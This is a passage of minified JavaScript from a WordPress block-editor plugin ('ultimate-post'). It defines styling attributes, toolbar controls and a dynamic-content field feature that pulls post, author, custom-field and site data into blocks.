}"}]},readMoreHoverColor:{type:"string",default:"rgba(255,255,255,0.80)",style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-readmore a:hover { color:{{readMoreHoverColor}}; } \n            {{ULTP}} .ultp-block-readmore a:hover svg { fill:{{readMoreHoverColor}} !important; }"}]},readMoreBgHoverColor:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a:hover"}]},readMoreHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a:hover"}]},readMoreHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a:hover { border-radius:{{readMoreHoverRadius}}; }"}]},readMoreSacing:{type:"object",default:{lg:{top:15,bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore { margin:{{readMoreSacing}}; }"}]},readMorePadding:{type:"object",default:{lg:{top:"2",bottom:"2",left:"6",right:"6",unit:"px"}},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a { padding:{{readMorePadding}}; }"}]}}},22886:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={vidIconEnable:{type:"boolean",default:!0},popupAutoPlay:{type:"boolean",default:!1},vidIconPosition:{type:"string",default:"topRight",style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"bottomRight"}],selector:"{{ULTP}} .ultp-video-icon { bottom: 20px; right: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-video-icon {  margin: 0 auto; position: absolute; top: 50%; left: 50%; transform: translate(-50%,-60%); -o-transform: translate(-50%,-60%); -ms-transform: translate(-50%,-60%); -moz-transform: translate(-50%,-60%); -webkit-transform: translate(-50%,-50%); z-index: 998;}"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"bottomLeft"}],selector:"{{ULTP}} .ultp-video-icon { bottom: 20px; left: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"topRight"}],selector:"{{ULTP}} .ultp-video-icon { top: 20px; right: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"topLeft"}],selector:"{{ULTP}} .ultp-video-icon { top: 20px; left: 20px; }"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"rightMiddle"}],selector:"{{ULTP}} .ultp-video-icon {display: flex; justify-content: flex-end; align-items: center; height: 100%; width: 100%; top:0px;}"},{depends:[{key:"vidIconEnable",condition:"==",value:!0},{key:"vidIconPosition",condition:"==",value:"leftMiddle"}],selector:"{{ULTP}} .ultp-video-icon {display: flex; justify-content: flex-start; align-items: center; height: 100%; width: 100%; top: 0px;}"}]},popupIconColor:{type:"string",default:"#fff",style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-icon svg { color: {{popupIconColor}}; } \n            {{ULTP}} .ultp-video-icon svg circle { color: {{popupIconColor}}; }"}]},popupHovColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-icon svg:hover { color: {{popupHovColor}}; } \n            {{ULTP}} .ultp-video-icon svg:hover circle { color: {{popupHovColor}};}"}]},iconSize:{type:"object",default:{lg:"40",sm:"30",xs:"30",unit:"px"},style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-icon svg { height:{{iconSize}}; width: {{iconSize}};}"}]},enablePopup:{type:"boolean",default:!1,style:[{depends:[{key:"vidIconEnable",condition:"==",value:!0}]}]},popupWidth:{type:"object",default:{lg:"70"},style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-modal__Wrapper {width:{{popupWidth}}% !important;}"}]},enablePopupTitle:{type:"boolean",default:!0,style:[{depends:[{key:"enablePopup",condition:"==",value:!0}]}]},popupTitleColor:{type:"string",default:"#fff",style:[{depends:[{key:"enablePopupTitle",condition:"==",value:!0},{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-modal__Wrapper a { color:{{popupTitleColor}} !important; }"}]},closeIconSep:{type:"string",default:"#fff",style:[{depends:[{key:"enablePopup",condition:"==",value:!0}]}]},closeIconColor:{type:"string",default:"#fff",style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-close { color:{{closeIconColor}}; }"}]},closeHovColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-close:hover { color:{{closeHovColor}}; }"}]},closeSize:{type:"object",default:{lg:"70",unit:"px"},style:[{depends:[{key:"enablePopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-video-close { font-size:{{closeSize}}; }"}]}}},73151:(e,t,l)=>{"use strict";l.d(t,{O:()=>o,h:()=>a});const o={type:"object",default:{runComp:!0}};function a(e){const{attributes:{V4_1_0_CompCheck:{runComp:t}}}=e;t&&function(e){const{attributes:{blockId:t,V4_1_0_CompCheck:{runComp:l},headingShow:o,paginationShow:a,filterShow:i},setAttributes:n,name:r,clientId:s}=e;function p(){l&&n({V4_1_0_CompCheck:{runComp:!1}})}"ultimate-post/ultp-taxonomy"===r&&o?t?p():(n({headingShow:!1}),function(e){const{getBlockIndex:t,getBlockOrder:l,getBlockRootClientId:o,getBlockName:a}=wp.data.select("core/block-editor"),{insertBlock:i}=wp.data.dispatch("core/block-editor"),{createBlock:n}=wp.blocks,r=t(e),s=o(e);r>0&&"ultimate-post/heading"===a(l(s)[r-1])||i(n("ultimate-post/heading",{}),r,s,!1)}(s)):t?(["ultimate-post/post-slider-1","ultimate-post/post-slider-2"].includes(r)&&t&&o||t&&(o||a||i))&&p():n({readMore:!1,headingShow:!1,paginationShow:!1,filterShow:!1})}(e)}},2963:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(74971);function i({dcFields:e,setAttributes:t,startOnboarding:l,overlayMode:i=!1,inverseColor:n=!1}){const r=e.every((e=>e));return(0,o.createElement)("button",{type:"button",className:`ultp-add-dc-button ${r?"ultp-add-dc-button-disabled":""} ${i?"ultp-add-dc-button-top":""} ${n?"ultp-add-dc-button-inverse":""}`,onClick:o=>{if(r)return;o.stopPropagation();const i=[...e],n=i.findIndex((e=>!e));n>=0&&(i.splice(n,1),i.unshift({id:(new Date).getTime(),fields:[(0,a.rB)()]}),t({dcFields:i}),l())}},(0,o.createElement)("span",{style:{display:"flex",alignItems:"center",justifyContent:"center"}},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"19px",height:"19px",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fill:"currentColor",d:"M19 12.998h-6v6h-2v-6H5v-2h6v-6h2v6h6z"}))),(0,o.createElement)("span",null,"Add Custom Field"))}l(43958)},82473:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(69735),i=l(53049),n=l(13448),r=l(32258),s=l(74971),p=l(46558);const{__}=wp.i18n,{ToolbarButton:c}=wp.components,u=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",style:{fill:"transparent"}},(0,o.createElement)("path",{d:"M4 18V6a2 2 0 0 1 2-2h8.864a2 2 0 0 1 1.414.586l3.136 3.136A2 2 0 0 1 20 9.136V18a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2Z",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"9.5",cy:"9.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"9.5",cy:"14.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"14.5",cy:"9.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"14.5",cy:"14.5",r:".5",fill:"#070707",stroke:"#070707",strokeWidth:"1.5"}));function d({store:e,selected:t,layoutContext:l}){const{selectedDC:d,setSelectedDc:m,selectParentMetaGroup:g,attributes:{dcFields:y,dcGroupStyles:b}}=e,{moveMetaGroupUp:v,moveMetaGroupDown:h,removeMetaGroup:f,addMeta:k,removeMeta:w,moveMetaUp:x,moveMetaDown:T}=(0,a.Ic)({...e,layoutContext:l});if("dc_group"===t)return(0,o.createElement)(r.Z,{text:"Meta Group"},(0,o.createElement)(p.Z,{moveUp:v,moveDown:h,idx:+d}),(0,o.createElement)(n.Z,{buttonContent:i.YG,include:(0,i.tv)([{name:"tab",title:__("Meta Group Style","ultimate-post"),options:[{type:"dynamicContent",key:"dcGroupStyles",fields:[{type:"alignment",label:__("Alignment","ultimate-post"),responsive:!0,key:"dcGAlign",options:["flex-start","center","flex-end","space-between"],icons:["left_new","center_new","right_new","justbetween_new"],dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"toggle",label:__("Inline","ultimate-post"),key:"dcGInline",dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"range",label:__("Spacing Top","ultimate-post"),key:"dcGSpacingTop",min:0,max:200,step:1,responsive:!0,unit:!0,dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"range",label:__("Spacing Bottom","ultimate-post"),key:"dcGSpacingBottom",min:0,max:200,step:1,responsive:!0,unit:!0,dcParentKey:"dcGroupStyles",dcIdx:+d},{type:"range",label:__("Spacing Between","ultimate-post"),key:"dcGSpacing",min:0,max:200,step:1,responsive:!0,unit:!0,dcParentKey:"dcGroupStyles",dcIdx:+d}]}]}]),store:e,label:__("Meta Group Style","ultimate-post")}),(0,o.createElement)(c,{label:__("Add New Meta Field","ultimate-post"),onClick:()=>k(+d),icon:(0,o.createElement)("span",{className:"dashicons dashicons-plus"})}),(0,o.createElement)(c,{label:__("Delete Meta Group","ultimate-post"),onClick:()=>f(+d),icon:(0,o.createElement)("span",{className:"dashicons dashicons-trash"})}));if("dc_field"===t){if("string"!=typeof d)return console.log("whoa",d),null;const[t,l,a]=d.split(",").map(Number),m=y[t]?.fields?.length>1,b=wp.data.select("core/block-editor").getBlock(e.clientId);return(0,o.createElement)(r.Z,{text:"Meta Field"},(0,o.createElement)("div",{className:"ultp-dynamic-content-sel-parent-btn"},(0,o.createElement)(c,{label:__("Select Parent Meta Group","ultimate-post"),onClick:()=>g(t),icon:u})),m&&(0,o.createElement)(p.Z,{moveUp:T,moveDown:x,idx:t,subIdx:l,mode:"horizontal"}),(0,o.createElement)(s.ZP,{isActive:!1,headingBlock:b,type:"toolbar",config:{groupIdx:t,fieldIdx:l,isOnboarding:1===a,icon:!0}}),(0,o.createElement)(n.Z,{buttonContent:i.YG,include:(0,i.tv)([{name:"tab",title:__("Meta Field Style","ultimate-post"),options:[{type:"dynamicContent",key:"dcFieldStyles",fields:[{type:"separator",label:__("Meta Field","ultimate-post")},{type:"typography",label:__("Typography","ultimate-post"),key:"dcFTypo",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("Color","ultimate-post"),key:"dcFColor",key2:"dcFColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"separator",label:__("Before Text","ultimate-post")},{type:"typography",label:__("Before Typography","ultimate-post"),key:"dcFBeforeTypo",key2:"dcFBeforeColor",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("Before Color","ultimate-post"),key:"dcFBeforeColor",key2:"dcFBeforeColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"range",label:__("Before Spacing","ultimate-post"),key:"dcBeforeSpacing",min:0,max:100,step:1,responsive:!1,unit:!1,dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"separator",label:__("After Text","ultimate-post")},{type:"typography",label:__("Afte Typography","ultimate-post"),key:"dcFAfterTypo",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("After Color","ultimate-post"),key:"dcFAfterColor",key2:"dcFAfterColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"range",label:__("After Spacing","ultimate-post"),key:"dcAfterSpacing",min:0,max:100,step:1,responsive:!1,unit:!1,dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"separator",label:__("Icon","ultimate-post")},{type:"range",label:__("Icon Size","ultimate-post"),key:"dcFIconSize",min:0,max:100,step:1,responsive:!1,unit:!1,dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}},{type:"color",label:__("Icon Color","ultimate-post"),key:"dcFIconColor",key2:"dcFIconColorHover",dcParentKey:"dcFieldStyles",dcIdx:{groupIdx:t,fieldIdx:l}}]}]}]),store:e,label:__("Meta Group Style","ultimate-post")}),(0,o.createElement)(c,{label:__("Delete Meta Field","ultimate-post"),onClick:()=>w(t,l),icon:(0,o.createElement)("span",{className:"dashicons dashicons-trash"})}))}return null}},12641:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(30319),n=l(2376),r=l(22465);const{__}=wp.i18n,{useEffect:s,useState:p,useRef:c}=wp.element,{useSelect:u}=wp.data;function d({field:e,postId:t,settingsOnClick:l,resetOnboarding:p,groupIdx:c,idx:d}){const{text:m,hasResolved:g}=u((l=>{let a="",n="",s=[];const p="post_type"===e.dataSrc?e.postId:String(t);e.contentSrc.startsWith(r.AF)&&(a=l(i.$6).getPostInfo(p,e.contentSrc.slice(r.AF.length)),n="getPostInfo",s=[p,e.contentSrc.slice(r.AF.length)]),e.contentSrc.startsWith(r.El)&&(a=l(i.$6).getAuthorInfo(p,e.contentSrc.slice(r.El.length)),n="getAuthorInfo",s=[p,e.contentSrc.slice(r.El.length)]),(e.contentSrc.startsWith(r.BQ)||e.contentSrc.startsWith(r._P)||e.contentSrc.startsWith(r.uy)||e.contentSrc.startsWith(r.Ix))&&(a=l(i.$6).getCFValue(p,e.contentSrc),n="getCFValue",s=[p,e.contentSrc]),e.dataSrc.startsWith(r.Bj)&&(a=l(i.$6).getSiteInfo(e.dataSrc.slice(r.Bj.length)),n="getSiteInfo",s=[e.dataSrc.slice(r.Bj.length)]),["string","number","boolean","bigint"].includes(typeof a)?(a=String(a),e.maxCharLen&&(a=a.split(" ").slice(0,+e.maxCharLen).join(" "))):(console.log("Invalid Data Type: ",a),a=null),a||(a=e.fallback||"[EMPTY]");const c=""!==e.dataSrc&&l(i.$6).hasFinishedResolution(n,s);return{text:(0,o.createElement)(o.Fragment,null,e.beforeText&&(0,o.createElement)("p",{className:"ultp-dynamic-content-field-before"},e.beforeText),(0,o.createElement)("p",{className:"ultp-dynamic-content-field-dc"},a),e.afterText&&(0,o.createElement)("p",{className:"ultp-dynamic-content-field-after"},e.afterText)),hasResolved:c}}));s((()=>{g&&p(c,d)}),[g]);const{elementRef:y,isSelected:b,setIsSelected:v}=(0,n.Z)();return(0,o.createElement)("div",{ref:y,className:`ultp-dynamic-content-field-common ultp-dynamic-content-field-${e.id} ultp-component-simple ${b?"ultp-component-selected":""}`,onClick:e=>{v(!0),l(e,"dc_field")}},""===e.dataSrc?(0,o.createElement)("span",{className:"ultp-dynamic-content-field-dc"},__("Custom Field","ultimate-post")):g?(0,o.createElement)(o.Fragment,null,e.icon&&(0,o.createElement)("span",{className:"ultp-dynamic-content-field-icon"},a.ZP[e.icon]),m):(0,o.createElement)("span",{className:"ultp-dynamic-content-field-dc"},__("Loading…","ultimate-post")))}},39349:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(2376),i=l(74971),n=l(12641);function r({idx:e,postId:t,fields:l,settingsOnClick:r,selectedDC:s,setSelectedDc:p,dcFields:c,setAttributes:u}){const d=l[e],{elementRef:m,isSelected:g,setIsSelected:y}=(0,a.Z)();return d?(0,o.createElement)("div",{ref:m,className:"ultp-dynamic-content-group-common ultp-dynamic-content-group-"+l[e].id,onClick:t=>{y(!0),p(e),r(t,"dc_group")}},l[e]?.fields.map(((l,a)=>(0,o.createElement)(n.Z,{key:a,idx:a,postId:t,groupIdx:e,field:l,resetOnboarding:(e,t)=>{s===`${e},${t},1`&&(p(""),r(null,""),wp.data.dispatch("core/block-editor").clearSelectedBlock())},settingsOnClick:t=>{p(`${e},${a}`),r(t,"dc_field")}}))),g&&(0,o.createElement)("button",{type:"button",className:"components-button block-editor-inserter__toggle has-icon","aria-label":"Add a new Meta Field",onClick:t=>{t.stopPropagation();const l=[...c];l[e].fields.push((0,i.rB)()),u({dcFields:l})}},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",width:18,height:24,"aria-hidden":"true",focusable:"false",fill:"white"},(0,o.createElement)("path",{d:"M11 12.5V17.5H12.5V12.5H17.5V11H12.5V6H11V11H6V12.5H11Z"})))):null}},46558:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({moveUp:e,moveDown:t,idx:l,subIdx:a=null,mode:i="vertical"}){return(0,o.createElement)("div",{className:"ultp-toolbar-sort"+("horizontal"===i?" ultp-toolbar-sort-horizontal":"")},(0,o.createElement)("span",{title:"Move Element Up",role:"button","aria-label":"Move element up",className:"ultp-toolbar-sort-btn",onClick:()=>t(l,a)},(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg","aria-hidden":"true",focusable:"false"},(0,o.createElement)("path",{d:"M6.5 12.4L12 8l5.5 4.4-.9 1.2L12 10l-4.5 3.6-1-1.2z"}))),(0,o.createElement)("span",{title:"Move Element Down",role:"button","aria-label":"Move element down",className:"ultp-toolbar-sort-btn",onClick:()=>e(l,a)},(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg","aria-hidden":"true",focusable:"false"},(0,o.createElement)("path",{d:"M17.5 11.6L12 16l-5.5-4.4.9-1.2L12 14l4.5-3.6 1 1.2z"}))))}l(66584)},51579:(e,t,l)=>{"use strict";function o(e={}){const{defColor:t=null}=e;return{dcEnabled:{type:"boolean",default:!1},dcFields:{type:"array",default:[]},dcGroupStyles:{type:"object",fields:{dcGAlign:{type:"string",default:"",style:[{depends:[{key:"dcGInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { justify-content:{{dcGAlign}}; flex-direction:row; }"},{depends:[{key:"dcGInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { align-items:{{dcGAlign}}; flex-direction:column; }"}]},dcGInline:{type:"boolean",default:!0},dcGSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { gap:{{dcGSpacing}}; }"}]},dcGSpacingTop:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { padding-top:{{dcGSpacingTop}}; }"}]},dcGSpacingBottom:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { padding-bottom:{{dcGSpacingBottom}}; }"}]}},default:{default:{dcGAlign:"flex-start",dcGInline:!0,dcGSpacing:{lg:"10",ulg:"px"},dcGSpacingTop:{lg:"5",ulg:"px"},dcGSpacingBottom:{lg:"5",ulg:"px"}}}},dcFieldStyles:{type:"object",fields:{dcFTypo:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc"}]},dcFColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc { color:{{dcFColor}}; }"}]},dcFSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc { margin-inline:{{dcFSpacing}}px; }"}]},dcFColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc:hover { color:{{dcFColorHover}}; }"}]},dcFBeforeTypo:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before"}]},dcFBeforeColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before { color:{{dcFBeforeColor}}; }"}]},dcFBeforeColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before:hover { color:{{dcFBeforeColorHover}}; }"}]},dcBeforeSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before { margin-right:{{dcBeforeSpacing}}px; }"}]},dcFAfterTypo:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after"}]},dcFAfterColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after { color:{{dcFAfterColor}}; }"}]},dcFAfterColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after:hover { color:{{dcFAfterColorHover}}; }"}]},dcAfterSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after { margin-left:{{dcAfterSpacing}}px; }"}]},dcFIconSize:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-icon svg { width:{{dcFIconSize}}px; height:auto; }"}]},dcFIconColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-icon svg { color: {{dcFIconColor}};  }"}]},dcFIconColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-icon:hover svg { color: {{dcFIconColorHover}};  }"}]}},default:{default:{dcFTypo:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"300"},dcFColor:t||"var(--postx_preset_Contrast_1_color)",dcFColorHover:t||"var(--postx_preset_Primary_color)",dcFSpacing:"0",dcFBeforeTypo:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"300"},dcFBeforeColor:t||"var(--postx_preset_Contrast_1_color)",dcFBeforeColorHover:t||"var(--postx_preset_Primary_color)",dcFAfterTypo:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"300"},dcFAfterColor:t||"var(--postx_preset_Contrast_1_color)",dcFAfterColorHover:t||"var(--postx_preset_Primary_color)",dcFIconSize:"11",dcFIconColor:t||"var(--postx_preset_Contrast_1_color)",dcFIconColorHover:t||"var(--postx_preset_Primary_color)"}}}}}l.d(t,{b:()=>o})},74971:(e,t,l)=>{"use strict";l.d(t,{ZP:()=>_,rB:()=>T,sN:()=>x});var o=l(67294),a=(l(93332),l(30319)),i=l(53049),n=l(41557),r=l(22465);const{applyFormat:s,insert:p,removeFormat:c}=wp.richText,{__}=wp.i18n,{useState:u}=wp.element,{BlockControls:d}=wp.blockEditor,{useSelect:m}=wp.data,{Dropdown:g,ToolbarButton:y,ToolbarGroup:b,SelectControl:v,Button:h,ToggleControl:f,PanelBody:k,__experimentalNumberControl:w}=wp.components,x={dataSrc:"",postType:"",postId:"",contentSrc:"",linkEnabled:!1,linkSrc:"",beforeText:"",afterText:"",iconType:"",icon:"",fallback:"",maxCharLen:""};function T(){return{...x,id:(new Date).getTime()}}function _({isActive:e,headingBlock:t,richTextProps:l={},type:a="field",attrKey:n="",config:r=null}){const s=()=>(0,o.createElement)(g,{contentClassName:"ultp-dynamic-content-wrapper",defaultOpen:r?.isOnboarding,renderToggle:({onToggle:t,isOpen:l})=>(e&&!l&&t(),"field"===a?(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),e.preventDefault(),t()},className:"ultp-dc-field-dropdown"},(0,o.createElement)("span",{className:"ultp-dc-field-dropdown dashicons dashicons-database-add"})):"heading"===a?(0,o.createElement)("span",null,(0,o.createElement)(y,{label:__("Dynamic Content","ultimate-post"),icon:(0,o.createElement)("span",{className:"dashicons dashicons-database-add"}),onClick:()=>t(),isActive:l})):"toolbar"===a?(0,o.createElement)(y,{label:__("Meta Field Settings","ultimate-post"),onClick:()=>t(),icon:i.HU}):void 0),renderContent:()=>(0,o.createElement)("div",{className:"ultp-dynamic-content-dropdown"},(0,o.createElement)(E,{richTextProps:l,headingBlock:t,type:a,attrKey:n,config:r}))});return"field"===a||"toolbar"===a?s():"heading"===a?(0,o.createElement)(o.Fragment,null,(0,o.createElement)(d,null,(0,o.createElement)(b,null,s()))):void 0}function C(e,t){const{updateBlockAttributes:l}=wp.data.dispatch("core/block-editor");l(e,t)}function E({richTextProps:e,headingBlock:t,type:l,attrKey:i,config:d}){var g;const[y,b]=u("toolbar"===l?t.attributes.dcFields[d.groupIdx].fields[d.fieldIdx]:i?t.attributes.dc[i]:t.attributes.dc),[T,_]=u(!1),E=m((e=>y.postId||e("core/editor").getCurrentPostId()),[y.postId]),S=async o=>{_(!0);try{if(o)if("toolbar"===l){const e=[...t.attributes.dcFields];e[d.groupIdx].fields[d.fieldIdx]=y,C(t.clientId,{dcEnabled:!0,dcFields:e})}else{let o="",n="",c=[];if(y.contentSrc.startsWith(r.AF)&&(o=await wp.data.resolveSelect(a.$6).getPostInfo(E,y.contentSrc.slice(r.AF.length)),n="getPostInfo",c=[E,y.contentSrc.slice(r.AF.length)]),y.contentSrc.startsWith(r.El)&&(o=await wp.data.resolveSelect(a.$6).getAuthorInfo(E,y.contentSrc.slice(r.El.length)),n="getAuthorInfo",c=[E,y.contentSrc.slice(r.El.length)]),(y.contentSrc.startsWith(r.BQ)||y.contentSrc.startsWith(r._P)||y.contentSrc.startsWith(r.Ix)||y.contentSrc.startsWith(r.uy))&&(o=await wp.data.resolveSelect(a.$6).getCFValue(E,y.contentSrc),n="getCFValue",c=[E,y.contentSrc]),y.dataSrc.startsWith(r.Bj)&&(o=await wp.data.resolveSelect(a.$6).getSiteInfo(y.dataSrc.slice(r.Bj.length)),n="getSiteInfo",c=[y.dataSrc.slice(r.Bj.length)]),y.contentSrc.startsWith(r.uZ)&&(o=await wp.data.resolveSelect(a.$6).getLink(E,y.contentSrc),n="getLink",c=[E,y.contentSrc]),y.linkEnabled&&y.linkSrc&&d?.linkOnly&&(o=await wp.data.resolveSelect(a.$6).getLink(E,y.linkSrc),n="getLink",c=[E,y.linkSrc]),(0,a.gH)(n,c),["string","number","boolean","bigint"].includes(typeof o)?(o=String(o),y.maxCharLen&&(o=o.split(" ").slice(0,+y.maxCharLen).join(" "))):(console.log("Invalid Data Type: ",o),o=null),o||(o=y.fallback||"[EMPTY]"),o=y.beforeText+o+y.afterText,"heading"===l&&(C(t.clientId,{dcEnabled:!0,dc:y}),function(e,t,l){const{isActive:o,value:a,onChange:i,onFocus:n}=t,{start:r,end:c}=function(e){let t,l;for(let l=0;l<e.length;l++)if(e[l]&&e[l].some((e=>"ultimate-post/dynamic-content"===e.type))){t=l;break}for(let t=e.length;t>=0;t--)if(e[t]&&e[t].some((e=>"ultimate-post/dynamic-content"===e.type))){l=t;break}return{start:t,end:l}}(a.formats),u=null!=r?r:a.start,d=p(a,e,u,c?c+1:a.end),m=u+e.length;i(s(d,{type:"ultimate-post/dynamic-content",title:__("Dynamic Content","ultimate-post")},u,m)),C(l.clientId,{dcText:{start:u,end:m}}),wp.data.dispatch("core/block-editor").selectBlock()}(o,e,t)),"ultimate-post/image"===t.name){const e={dc:{...t.attributes.dc,[i]:y},dcEnabled:{...t.attributes.dcEnabled,[i]:!0}};["imageUpload","darkImage"].includes(i)?e[i]={...t.attributes[i],url:o}:e[i]=o,C(t.clientId,e)}}else{if("heading"===l&&(C(t.clientId,{dcEnabled:!1,dc:x}),function(e){const{value:t,onChange:l}=e;l(c(t,"ultimate-post/dynamic-content")),wp.data.dispatch("core/block-editor").selectBlock()}(e)),"field"===l&&"ultimate-post/image"===t.name){const e={dc:{...t.attributes.dc,[i]:x},dcEnabled:{...t.attributes.dcEnabled,[i]:!1}};["imageUpload","darkImage"].includes(i)?e[i]={...t.attributes[i],url:""}:e[i]="",C(t.clientId,e)}"toolbar"===l&&C(t.clientId,{dcEnabled:!1}),b((e=>({...e,...x})))}}catch(e){console.log(e)}finally{_(!1)}};if("heading"===l&&!e.isActive&&t.attributes.dcEnabled)return(0,o.createElement)("div",{className:"ultp-dynamic-content-empty"},__("This block only supports 1 Dynamic Data Binding.","ultimate-post"));const 